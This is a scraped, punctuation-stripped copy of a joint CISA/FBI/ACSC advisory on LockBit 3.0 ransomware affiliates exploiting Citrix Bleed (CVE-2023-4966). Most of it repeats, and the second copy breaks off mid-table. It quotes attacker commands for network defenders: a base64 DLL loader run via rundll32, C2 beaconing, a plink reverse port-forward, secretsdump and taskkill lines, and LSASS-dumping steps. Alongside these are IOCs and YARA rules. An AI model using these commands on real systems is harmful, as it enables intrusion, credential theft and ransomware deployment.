StopRansomware LockBit 30 Ransomware Affiliates Exploit CVE 20234966 Citrix Bleed Vulnerability CISA
pAn official website of the United States governmentppHeres how you knowpp
Official websites use gov
A gov website belongs to an official government organization in the United States
pp
Secure gov websites use HTTPS
A lock LockA locked padlock or https means youve safely connected to the gov website Share sensitive information only on official secure websites
ppSearchppNote This joint Cybersecurity Advisory CSA is part of an ongoing StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors These StopRansomware advisories include recently and historically observed tactics techniques and procedures TTPs and indicators of compromise IOCs to help organizations protect against ransomware Visit stopransomwaregov to see all StopRansomware advisories and to learn more about other ransomware threats and nocost resourcesppThe Cybersecurity and Infrastructure Security Agency CISA Federal Bureau of Investigation FBI MultiState Information Sharing Analysis Center MSISAC and Australian Signals Directorates Australian Cyber Security Centre ASDs ACSC are releasing this joint Cybersecurity Advisory CSA to disseminate IOCs TTPs and detection methods associated with LockBit 30 ransomware exploiting CVE20234966 labeled Citrix Bleed affecting Citrix NetScaler web application delivery control ADC and NetScaler Gateway appliancesppThis CSA provides TTPs and IOCs obtained from FBI ACSC and voluntarily shared by Boeing Boeing observed LockBit 30 affiliates exploiting CVE20234966 to obtain initial access to Boeing Distribution Inc its parts and distribution business that maintains a separate environment Other trusted third parties have observed similar activity impacting their organizationppHistorically LockBit 30 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors including education energy financial services food and agriculture government and emergency services healthcare manufacturing and transportation Observed TTPs for LockBit ransomware attacks can vary significantly in observed TTPsppCitrix Bleed known to be leveraged by LockBit 30 affiliates allows threat actors to bypass password requirements and multifactor authentication MFA leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control ADC and Gateway appliances Through the takeover of legitimate user sessions malicious actors acquire elevated permissions to harvest credentials move laterally and access data and resourcesppCISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA which include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge CenterppThe authoring organizations encourage network defenders to hunt for malicious activity on their networks using the detection methods and IOCs within this CSA If a potential compromise is detected organizations should apply the incident response recommendations If no compromise is detected organizations should immediately apply patches made publicly availableppFor the associated Malware Analysis Report MAR see MAR104789151v1 Citrix BleedppDownload the PDF version of this reportppFor a downloadable copy of IOCs seeppNote This advisory uses the MITRE ATTCK for Enterprise framework version 14 See the MITRE ATTCK Tactics and Techniques section for a table of the threat actors activity mapped to MITRE ATTCK tactics and techniques For assistance with mapping malicious cyber activity to the MITRE ATTCK framework see CISA and MITRE ATTCKs Best Practices for MITRE ATTCK Mapping and CISAs Decider ToolppCVE20234966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with exploitation activity identified as early as August 2023 This vulnerability provides threat actors including LockBit 30 ransomware affiliates the capability to bypass MFA T1556006 and hijack legitimate user sessions T1563ppAfter acquiring access to valid cookies LockBit 30 affiliates establish an authenticated session within the NetScaler appliance without a username password or access to MFA tokens T1539 Affiliates acquire this by sending an HTTP GET request with a crafted HTTP Host header leading to a vulnerable appliance returning system memory information T1082 The information obtained through this exploit contains a valid NetScaler AAA session cookieppCitrix publicly disclosed CVE20234966 on Oct 10 2023 within their Citrix Security Bulletin which issued guidance and detailed the affected products IOCs and recommendations Based on widely available public exploits and evidence of active exploitation CISA added this vulnerability to the Known Exploited Vulnerabilities KEVs Catalog This critical vulnerability exploit impacts the following software versions 1ppDue to the ease of exploitation CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networksppMalware identified in this campaign is generated beginning with the execution of a PowerShell script 123ps1 which concatenates two base64 strings together converts them to bytes and writes them to the designated file pathppy TVqQAAMAlong base64 string
x RyEHABFQlong base64 string
filePath CUsersPublicadobelibdll
fileBytes SystemConvertFromBase64Stringy x
SystemIOFileWriteAllBytesfilePath fileBytesppThe resulting file adobelibdll is then executed by the PowerShell script using rundll32pprundll32 CUsersPublicadobelibdllmain 104 hex char keyppThe Dynamic Link Library DLL will not execute correctly without the 104 hex character key Following execution the DLL attempts to send a POST request to httpsadobeusupdatefilesdigitalindexphp which resolves to IP addresses 17267129176 and 104211180 as of November 16 2023 Although adobelibdll and the adobeusupdatefilesdigital have the appearance of legitimacy the file and domain have no association with legitimate Adobe software and no identified interaction with the softwareppOther observed activities include the use of a variety of TTPs commonly associated with ransomware activity For example LockBit 30 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring RMM Batch and PowerShell scripts the execution of HTA files using the Windows native utility mshtaexe and other common software tools typically associated with ransomware incidentsppSee Table 1Table 5 for IOCs related to Lockbit 30 affiliate exploitation of CVE20234966ppLow confidence indicators may not be related to ransomwareppDisclaimer Some IP addresses in this CSA may be associated with legitimate activity Organizations are encouraged to investigate the activity around these IP addresses prior to taking action such as blocking Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actorsppIndicatorppTypeppFidelityppDescriptionpp19222922195ppIPppLowppMagdll calls out to this IP address Ties back to dns0org Should run this DLL in a sandbox when possible to confirm C2 IP is shared hostingpp123ps1ppPowerShell scriptppHighppCreates and executes payload via scriptpp1932019224ppIPppHighppFTP to Russian geolocated IP from compromised systempp622335025ppIPppHighppRussian geolocated IP from compromised systemppHxxp622335025enusdocshtmlppHxxp622335025enustesthtmlpp51917917ppIPppMedppTempsh IPppTeamviewerppTool Remote AdminppLowpp pp70378220ppIPppLowppIP was seen from a known compromised account reaching out to an Altera IP address LockBit is known to leverage Altera a remote admin tool such as Anydesk team viewer etcpp1851740178ppIPppLowppTeamviewer C2 ties back to a polish service provider Artnet Sp Zoo Polish IP addressppIndicatorppTypeppFidelityppDescriptionpp18522919141ppAnydesk UsageppHighppAnydesk C2pp8119135219ppIPppHighppRussian geolocated IP hxxp8119135219F8PtZ87fE8dJWqehtappHxxp8119135219443q0X5wzEh6P7htapp45129137233ppIPppMediumppCallouts from known compromised device beginning during the compromised windowpp18522919141ppAnydesk UsageppHighppAnydesk C2ppPlinkexeppCommand interpreterppHighppPlink PuTTY Link is a commandline connection tool similar to UNIX SSH It is mostly used for automated operations such as making CVS access a repository on a remote server Plink can be used to automate SSH actions and for remote SSH tunneling on WindowsppAnyDeskMSIexeppRemote admin toolppHighppWe do see that AnyDeskMSIexe was installed as a service with auto start abilities for persistence Config file from the image could be leveraged to find the ID and Connection IP but we do not have that currentlyppSRUtilityexeppSplashtop utilitypp pp9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30appNetscan exeppNetwork scanning softwareppHighpp498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155ppIndicatorppTypeppFidelityppDescriptionppScheduled taskppMEGAMEGAcmdppPersistencepp ppHighpp ppScheduled taskppUpdateAdobeTaskppPersistenceppHighpp ppMagdllppPersistenceppHighppIdentified as running within UpdateAdobeTask cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63pp123ps1ppScriptppHighppCreates rundll32 CUsersPublicadobelibdllmain ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44ppAdobelibdllppPersistenceppLowppC2 from adobelibdllppAdobeusupdatefilesdigitalppTool DownloadppHighppUsed to download obfuscated toolsetspp17267129176ppTool DownloadppHighppIP of adobeusupdatefilesdigitalpp104211180ppTool DownloadppHighppAdobeusupdatefilesdigitalppcmdexe q c cd 1 127001admin169861779344 21ppCommandppHighppwmiexecexe usageppcmdexe q c cd 1 127001admin169861779344 21ppCommandppHighppwmiexecexe usageppcmdexe q c query user 1 127001admin169861779344 21ppCommandppHighppwmiexecexe usageppcmdexe q c taskkill f im sqlwriterexe im winmysqladminexe im w3sqlmgrexe im sqlwbexe im sqltobexe im sqlservrexe im sqlserverexe im sqlscanexe im sqlbrowserexe im sqlrepexe im sqlmangrexe im sqlexp3exe im sqlexp2exe im sqlexppCommandppHighppwmiexecexe usageppcmdexe q c cd 1 127001admin169861813354 21ppCommandppHighppwmiexecexe usageppThe authoring organizations recommended monitoringreviewing traffic to the 8119135 class C network and review for MSHTA being called with HTTP arguments 2ppIndicatorppTypeppFidelityppDescriptionppNotespp8119135219ppIPppHighppRussian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7htapp pp8119135220ppIPppHighppRussian geolocated IP seen outbound in logsppIP registered to a South African Companypp8119135226ppIPppHighppRussian geolocated IP seen outbound in logsppIP registered to a South African CompanyppTypeppIndicatorppDescriptionppFilenameppcusersusernamedownloadsprocess hacker 2peviewexeppProcess hackerppFilenameppcusersusernamemusicprocess hacker 2processhackerexeppProcess hackerppFilenamepppsexesvcexeppPsexec service excutableppFilenameppcperflogsprocesshackerexeppProcess hackerppFilenameppcwindowstempscreenconnect23858707filesprocesshackerexeppProcess hacker transferred via screenconnectppFilenameppcperflogslsassdmpppLsass dumpppFilenameppcusersusernamedownloadsmimikatzexeppMimikatzppFilenameppcusersusernamedesktopproc64procexeppProcdumpppFilenameppcusersusernamedocumentsveeamgetcredsps1ppDecrypt veeam credsppFilenameppsecretsdumppyppImpacket installed on azure vmppCmdlineppsecretsdumppy domainusernameip outputfile 1ppImpacket installed on azure vmppFilenameppadps1ppAdrecon found in powershell transcriptsppFilenameppcperflogs64bitnetscanexeppSoftperfect netscanppFilenamepptniwinagentexeppTotal network inventory agentppFilenamepppsexecexeppPsexec used to deploy screenconnectppFilenamepp7zexeppUsed to compress filesppToolppAction1ppRMMppToolppAterappRMMpptoolppanydeskpprmmpptoolppfixme itpprmmpptoolppscreenconnectpprmmpptoolppsplashtoppprmmpptoolppzoho assistpprmmppipv4pp101973661ppzoho assistppipv4pp1681009137ppssh portforwarding infrappipv4pp18520209127ppzoho assistppipv4pp18523021283ppzoho assistppipv4pp20618819722pppowershell reverse shell seen in powershell loggingppipv4pp5484248205ppfixme ipppIpv4pp141989137ppRemote IP for CitrixBleedppdomainppassistzohoeuppzoho assistppfilenameppcperflogs1exeppconnectwise renamedppfilenameppcperflogsrunexeppscreenconnect pushed by psexecppfilenameppcperflogs64bitmexeppconnectwise renamedppfilenameppcperflogs64bitm0exeppconnectwise renamedppfilenameppcperflogszaaccessmydepartmentexeppzoho remote assistppfilenameppcusersusernamemusiczaaccessmydepartmentexeppzoho remote assistppfilenameppcwindowsservicehostexeppplink renamedppfilenameppcwindowssysconfbatppruns servicehostexe plink commandppfilenameppcwindowstempscreenconnect23858707filesazuremsippzoho remote assist used to transfer data via screenconnectppcmdlineppecho enter cwindowsservicehostexe ssh r 80851270018085 username1681009137 pw passwordppplink port forwardingppdomainppeu1dmszohoeuppzoho assistppdomainppfixmeitppfixme itppdomainppunattendedtechinlinenetppfixme itppSee Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisoryppTechnique TitleppIDppUseppSystem Information DiscoveryppT1082ppThreat actors will attempt to obtain information about the operating system and hardware including versions and patchesppTechnique TitleppIDppUseppModify Authentication Process Multifactor AuthenticationppT1556006ppThreat actors leverage vulnerabilities found within CVE to compromise modify andor bypass multifactor authentication to hijack user sessions harvest credentials and move laterally which enables persistent accessppSteal Web Session CookieppT1539ppThreat actors with access to valid cookies can establish an authenticated session within the NetScaler appliance without a username password or access to multifactor authentication MFA tokensppNetwork defenders should prioritize observing users in session when hunting for network anomalies This will aid the hunt for suspicious activity such as installing tools on the system eg putty rClone new account creation log item failure or running commands such as hostname quser whoami net and taskkill Rotating credentials for identities provisioned for accessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detectionppFor IP addressesppNote MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a tokensession for an already authenticated userppThe following procedures can help identify potential exploitation of CVE20234966 and LockBit 30 activityppBelow are CISA developed YARA rules and an opensource rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment For more information on detecting suspicious activity within NetScaler logs or additional resources visit CISAs Malware Analysis Report MAR MAR104789151v1 Citrix Bleed or the resource section of this CSA 3ppCISA received four files for analysis that show files being used to save registry hives dump the Local Security Authority Subsystem Service LSASS process memory to disk and attempt to establish sessions via Windows Remote Management WinRM The files includeppThis file is a Windows batch file called abat that is used to execute the file called aexe with the file called adll as an argument The output is printed to a file named ztxt located in the path CWindowsTasks Next abat pings the loop back internet protocol IP address 127001 three timesppThe next command it runs is reg save to save the HKLMSYSTEM registry hive into the CWindowstasksem directory Again abat pings the loop back address 127001 one time before executing another reg save command and saves the HKLMSAM registry hive into the CWindowsTaskam directory Next abat runs three makecab commands to create three cabinet cab files from the previously mentioned saved registry hives and one file named CUsersPublicapng The names of the cab files are as followspprule CISA1047891502 trojan installsothercomponents
meta
author CISA Code Media Analysis
incident 10478915
date 20231106
lastmodified 202311081500
actor na
family na
capabilities installsothercomponents
malwaretype trojan
tooltype unknown
description Detects trojan PE32 samples
sha256 e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
strings
s1 57 72 69 74 65 46 69 6c 65
s2 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64
s3 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74
s4 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72
s5 64 65 6c 65 74 65 5b 5d
s6 4e 41 4e 28 49 4e 44 29
condition
uint160 0x5a4d and peimphash 6e8ca501c45a9b85fff2378cffaa24b2 and pesizeofcode 84480 and all of
them
ppThis file is a 64bit Windows commandline executable called aexe that is executed by abat This file issues the remote procedure call RPC ncalrpclsasspirpc to the RPC end point to provide a file path to the LSASS on the infected machine Once the file path is returned the malware loads the accompanying DLL file called adll into the running LSASS process If the DLL is correctly loaded then the malware outputs the message success in the consolepprule CISA1047891503 trojan stealsauthenticationcredentials credentialexploitation
meta
author CISA Code Media Analysis
incident 10478915
date 20231106
lastmodified 202311081500
actor na
family na
capabilities stealsauthenticationcredentials
malwaretype trojan
tooltype credentialexploitation
description Detects trojan DLL samples
sha256 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
strings
s1 64 65 6c 65 74 65
s2 3c 2f 74 72 75 73 74 49 6e 66 6f 3e
s3 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28
s4 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78
s5 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57
s6 47 65 74 54 69 63 6b 43 6f 75 6e 74
condition
uint160 0x5a4d and pesubsystem peSUBSYSTEMWINDOWSCUI and pesizeofcode 56832 and all of
them
ppThis file is a 64bit Windows DLL called adll that is executed by abat as a parameter for the file aexe The file aexe loads this file into the running LSASS process on the infected machine The file adll calls the Windows API CreateFileW to create a file called apng in the path CUsersPublicppNext adll loads DbgCoredll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk If successful the dumped process memory is written to apng Once this is complete the file abat specifies that the file apng is used to create the cabinet file called acab in the path CWindowsTaskspprule CISA1047891504 backdoor communicateswithc2 remoteaccess
meta
author CISA Code Media Analysis
incident 10478915
date 20231106
lastmodified 202311081500
actor na
family na
capabilities communicateswithc2
malwaretype backdoor
tooltype remoteaccess
description Detects trojan python samples
sha256 906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6
strings
s1 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22
s2 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a
s3 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72
s4 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29
condition
all of them
ppThis file is a Python script called apy that attempts to leverage WinRM to establish a session The script attempts to authenticate to the remote machine using NT LAN Manager NTLM if the keyword hashpasswd is present If the keyword hashpasswd is not present then the script attempts to authenticate using basic authentication Once a WinRM session is established with the remote machine the script has the ability to execute command line arguments on the remote machine If there is no command specified then a default command of whoami is runppOrganizations are encouraged to assess Citrix software and your systems for evidence of compromise and to hunt for malicious activity see Additional Resources sectionIf compromise is suspected or detected organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the web management software as well as installing malicious codeppIf a potential compromise is detected organizations shouldppThese mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software CISA and authoring organizations recommend that software manufacturers incorporate securebydesign and default principles and tactics into their software development practices to limit the impact of exploitation such as threat actors leveraging unpatched vulnerabilities within Citrix NetScaler appliances which strengthens the security posture of their customersppFor more information on secure by design see CISAs Secure by Design and Default webpage and joint guideppThe authoring organizations of this CSA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix CVE 20234966 and LockBit 30 ransomware ransomware affiliates These mitigations align with the CrossSector Cybersecurity performance goals CPGs developed by CISA and the National Institute of Standards and Technology NIST The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats tactics techniques and procedures Visit CISAs CrossSector Cybersecurity Performance Goals for more information on the CPGs including additional recommended baseline protectionsppIn addition to applying mitigations CISA recommends exercising testing and validating your organizations security program against the threat behaviors mapped to the MITRE ATTCK for Enterprise framework in this advisory CISA recommends testing your existing security controls inventory to assess how they perform against the ATTCK techniques described in this advisoryppTo get startedppCISA and the authoring organizations recommend continually testing your security program at scale in a production environment to ensure optimal performance against the MITRE ATTCK techniques identified in this advisoryppThe FBI is seeking any information that can be shared to include boundary logs showing communication to and from foreign IP addresses a sample ransom note communications with LockBit 30 affiliates Bitcoin wallet information decryptor files andor a benign sample of an encrypted file The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered Furthermore payment may also embolden adversaries to target additional organizations encourage other criminal actors to engage in the distribution of ransomware andor fund illicit activities Regardless of whether you or your organization have decided to pay the ransom the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center IC3 at ic3gov local FBI Field Office or CISA via the agencys Incident Reporting System or its 247 Operations Center at reportcisagov or 888 2820870ppAustralian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASDs ACSC via 1300 CYBER1 1300 292 371 or by submitting a report to cybergovauppThe information in this report is being provided as is for informational purposes only CISA and authoring organizations do not endorse any commercial entity product company or service including any entities products or services linked within this document Any reference to specific commercial entities products processes or services by service mark trademark manufacturer or otherwise does not constitute or imply endorsement recommendation or favoring by CISA and the authoring organizationsppBoeing contributed to this CSApp1 NetScaler ADC and NetScaler Gateway Security Bulletin for CVE20234966
2 What is Mshta How Can it Be Used and How to Protect Against it McAfee
3 Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability CVE20234966pp ppNovember 21 2023 Initial versionpp pp ppThis product is provided subject to this Notification and this Privacy Use policyppWe recently updated our anonymous product survey wed welcome your feedbackp
Official websites use gov
A gov website belongs to an official government organization in the United States
pp
Secure gov websites use HTTPS
A lock LockA locked padlock or https means youve safely connected to the gov website Share sensitive information only on official secure websites
ppSearchppNote This joint Cybersecurity Advisory CSA is part of an ongoing StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors These StopRansomware advisories include recently and historically observed tactics techniques and procedures TTPs and indicators of compromise IOCs to help organizations protect against ransomware Visit stopransomwaregov to see all StopRansomware advisories and to learn more about other ransomware threats and nocost resourcesppThe Cybersecurity and Infrastructure Security Agency CISA Federal Bureau of Investigation FBI MultiState Information Sharing Analysis Center MSISAC and Australian Signals Directorates Australian Cyber Security Centre ASDs ACSC are releasing this joint Cybersecurity Advisory CSA to disseminate IOCs TTPs and detection methods associated with LockBit 30 ransomware exploiting CVE20234966 labeled Citrix Bleed affecting Citrix NetScaler web application delivery control ADC and NetScaler Gateway appliancesppThis CSA provides TTPs and IOCs obtained from FBI ACSC and voluntarily shared by Boeing Boeing observed LockBit 30 affiliates exploiting CVE20234966 to obtain initial access to Boeing Distribution Inc its parts and distribution business that maintains a separate environment Other trusted third parties have observed similar activity impacting their organizationppHistorically LockBit 30 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors including education energy financial services food and agriculture government and emergency services healthcare manufacturing and transportation Observed TTPs for LockBit ransomware attacks can vary significantly in observed TTPsppCitrix Bleed known to be leveraged by LockBit 30 affiliates allows threat actors to bypass password requirements and multifactor authentication MFA leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control ADC and Gateway appliances Through the takeover of legitimate user sessions malicious actors acquire elevated permissions to harvest credentials move laterally and access data and resourcesppCISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA which include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge CenterppThe authoring organizations encourage network defenders to hunt for malicious activity on their networks using the detection methods and IOCs within this CSA If a potential compromise is detected organizations should apply the incident response recommendations If no compromise is detected organizations should immediately apply patches made publicly availableppFor the associated Malware Analysis Report MAR see MAR104789151v1 Citrix BleedppDownload the PDF version of this reportppFor a downloadable copy of IOCs seeppNote This advisory uses the MITRE ATTCK for Enterprise framework version 14 See the MITRE ATTCK Tactics and Techniques section for a table of the threat actors activity mapped to MITRE ATTCK tactics and techniques For assistance with mapping malicious cyber activity to the MITRE ATTCK framework see CISA and MITRE ATTCKs Best Practices for MITRE ATTCK Mapping and CISAs Decider ToolppCVE20234966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with exploitation activity identified as early as August 2023 This vulnerability provides threat actors including LockBit 30 ransomware affiliates the capability to bypass MFA T1556006 and hijack legitimate user sessions T1563ppAfter acquiring access to valid cookies LockBit 30 affiliates establish an authenticated session within the NetScaler appliance without a username password or access to MFA tokens T1539 Affiliates acquire this by sending an HTTP GET request with a crafted HTTP Host header leading to a vulnerable appliance returning system memory information T1082 The information obtained through this exploit contains a valid NetScaler AAA session cookieppCitrix publicly disclosed CVE20234966 on Oct 10 2023 within their Citrix Security Bulletin which issued guidance and detailed the affected products IOCs and recommendations Based on widely available public exploits and evidence of active exploitation CISA added this vulnerability to the Known Exploited Vulnerabilities KEVs Catalog This critical vulnerability exploit impacts the following software versions 1ppDue to the ease of exploitation CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networksppMalware identified in this campaign is generated beginning with the execution of a PowerShell script 123ps1 which concatenates two base64 strings together converts them to bytes and writes them to the designated file pathppy TVqQAAMAlong base64 string
x RyEHABFQlong base64 string
filePath CUsersPublicadobelibdll
fileBytes SystemConvertFromBase64Stringy x
SystemIOFileWriteAllBytesfilePath fileBytesppThe resulting file adobelibdll is then executed by the PowerShell script using rundll32pprundll32 CUsersPublicadobelibdllmain 104 hex char keyppThe Dynamic Link Library DLL will not execute correctly without the 104 hex character key Following execution the DLL attempts to send a POST request to httpsadobeusupdatefilesdigitalindexphp which resolves to IP addresses 17267129176 and 104211180 as of November 16 2023 Although adobelibdll and the adobeusupdatefilesdigital have the appearance of legitimacy the file and domain have no association with legitimate Adobe software and no identified interaction with the softwareppOther observed activities include the use of a variety of TTPs commonly associated with ransomware activity For example LockBit 30 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring RMM Batch and PowerShell scripts the execution of HTA files using the Windows native utility mshtaexe and other common software tools typically associated with ransomware incidentsppSee Table 1Table 5 for IOCs related to Lockbit 30 affiliate exploitation of CVE20234966ppLow confidence indicators may not be related to ransomwareppDisclaimer Some IP addresses in this CSA may be associated with legitimate activity Organizations are encouraged to investigate the activity around these IP addresses prior to taking action such as blocking Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actorsppIndicatorppTypeppFidelityppDescriptionpp19222922195ppIPppLowppMagdll calls out to this IP address Ties back to dns0org Should run this DLL in a sandbox when possible to confirm C2 IP is shared hostingpp123ps1ppPowerShell scriptppHighppCreates and executes payload via scriptpp1932019224ppIPppHighppFTP to Russian geolocated IP from compromised systempp622335025ppIPppHighppRussian geolocated IP from compromised systemppHxxp622335025enusdocshtmlppHxxp622335025enustesthtmlpp51917917ppIPppMedppTempsh IPppTeamviewerppTool Remote AdminppLowpp pp70378220ppIPppLowppIP was seen from a known compromised account reaching out to an Altera IP address LockBit is known to leverage Altera a remote admin tool such as Anydesk team viewer etcpp1851740178ppIPppLowppTeamviewer C2 ties back to a polish service provider Artnet Sp Zoo Polish IP addressppIndicatorppTypeppFidelityppDescriptionpp18522919141ppAnydesk UsageppHighppAnydesk C2pp8119135219ppIPppHighppRussian geolocated IP hxxp8119135219F8PtZ87fE8dJWqehtappHxxp8119135219443q0X5wzEh6P7htapp45129137233ppIPppMediumppCallouts from known compromised device beginning during the compromised windowpp18522919141ppAnydesk UsageppHighppAnydesk C2ppPlinkexeppCommand interpreterppHighppPlink PuTTY Link is a commandline connection tool similar to UNIX SSH It is mostly used for automated operations such as making CVS access a repository on a remote server Plink can be used to automate SSH actions and for remote SSH tunneling on WindowsppAnyDeskMSIexeppRemote admin toolppHighppWe do see that AnyDeskMSIexe was installed as a service with auto start abilities for persistence Config file from the image could be leveraged to find the ID and Connection IP but we do not have that currentlyppSRUtilityexeppSplashtop utilitypp pp9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30appNetscan exeppNetwork scanning softwareppHighpp498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155ppIndicatorppTypeppFidelityppDescriptionppScheduled taskppMEGAMEGAcmdppPersistencepp ppHighpp ppScheduled taskppUpdateAdobeTaskppPersistenceppHighpp ppMagdllppPersistenceppHighppIdentified as running within UpdateAdobeTask cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63pp123ps1ppScriptppHighppCreates rundll32 CUsersPublicadobelibdllmain ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44ppAdobelibdllppPersistenceppLowppC2 from adobelibdllppAdobeusupdatefilesdigitalppTool DownloadppHighppUsed to download obfuscated toolsetspp17267129176ppTool DownloadppHighppIP of adobeusupdatefilesdigitalpp104211180ppTool DownloadppHighppAdobeusupdatefilesdigitalppcmdexe q c cd 1 127001admin169861779344 21ppCommandppHighppwmiexecexe usageppcmdexe q c cd 1 127001admin169861779344 21ppCommandppHighppwmiexecexe usageppcmdexe q c query user 1 127001admin169861779344 21ppCommandppHighppwmiexecexe usageppcmdexe q c taskkill f im sqlwriterexe im winmysqladminexe im w3sqlmgrexe im sqlwbexe im sqltobexe im sqlservrexe im sqlserverexe im sqlscanexe im sqlbrowserexe im sqlrepexe im sqlmangrexe im sqlexp3exe im sqlexp2exe im sqlexppCommandppHighppwmiexecexe usageppcmdexe q c cd 1 127001admin169861813354 21ppCommandppHighppwmiexecexe usageppThe authoring organizations recommended monitoringreviewing traffic to the 8119135 class C network and review for MSHTA being called with HTTP arguments 2ppIndicatorppTypeppFidelityppDescriptionppNotespp8119135219ppIPppHighppRussian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7htapp pp8119135220ppIPppHighppRussian geolocated IP seen outbound in logsppIP registered to a South African Companypp8119135226ppIPppHighppRussian geolocated IP seen outbound in logsppIP registered to a South African CompanyppTypeppIndicatorppDescriptionppFilenameppcusersusernamedownloadsprocess hacker 2peviewexeppProcess hackerppFilenameppcusersusernamemusicprocess hacker 2processhackerexeppProcess hackerppFilenamepppsexesvcexeppPsexec service excutableppFilenameppcperflogsprocesshackerexeppProcess hackerppFilenameppcwindowstempscreenconnect23858707filesprocesshackerexeppProcess hacker transferred via screenconnectppFilenameppcperflogslsassdmpppLsass dumpppFilenameppcusersusernamedownloadsmimikatzexeppMimikatzppFilenameppcusersusernamedesktopproc64procexeppProcdumpppFilenameppcusersusernamedocumentsveeamgetcredsps1ppDecrypt veeam credsppFilenameppsecretsdumppyppImpacket installed on azure vmppCmdlineppsecretsdumppy domainusernameip outputfile 1ppImpacket installed on azure vmppFilenameppadps1ppAdrecon found in powershell transcriptsppFilenameppcperflogs64bitnetscanexeppSoftperfect netscanppFilenamepptniwinagentexeppTotal network inventory agentppFilenamepppsexecexeppPsexec used to deploy screenconnectppFilenamepp7zexeppUsed to compress filesppToolppAction1ppRMMppToolppAterappRMMpptoolppanydeskpprmmpptoolppfixme itpprmmpptoolppscreenconnectpprmmpptoolppsplashtoppprmmpptoolppzoho assistpprmmppipv4pp101973661ppzoho assistppipv4pp1681009137ppssh portforwarding infrappipv4pp18520209127ppzoho assistppipv4pp18523021283ppzoho assistppipv4pp20618819722pppowershell reverse shell seen in powershell loggingppipv4pp5484248205ppfixme ipppIpv4pp141989137ppRemote IP for CitrixBleedppdomainppassistzohoeuppzoho assistppfilenameppcperflogs1exeppconnectwise renamedppfilenameppcperflogsrunexeppscreenconnect pushed by psexecppfilenameppcperflogs64bitmexeppconnectwise renamedppfilenameppcperflogs64bitm0exeppconnectwise renamedppfilenameppcperflogszaaccessmydepartmentexeppzoho remote assistppfilenameppcusersusernamemusiczaaccessmydepartmentexeppzoho remote assistppfilenameppcwindowsservicehostexeppplink renamedppfilenameppcwindowssysconfbatppruns servicehostexe plink commandppfilenameppcwindowstempscreenconnect23858707filesazuremsippzoho remote assist used to transfer data via screenconnectppcmdlineppecho enter cwindowsservicehostexe ssh r 80851270018085 username1681009137 pw passwordppplink port forwardingppdomainppeu1dmszohoeuppzoho assistppdomainppfixmeitppfixme itppdomainppunattendedtechinlinenetppfixme itppSee Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisoryppTechnique TitleppIDppUseppSystem Information DiscoveryppT1082ppThreat actors will attempt to obtain information about the operating system and hardware including versions and patchesppTechnique 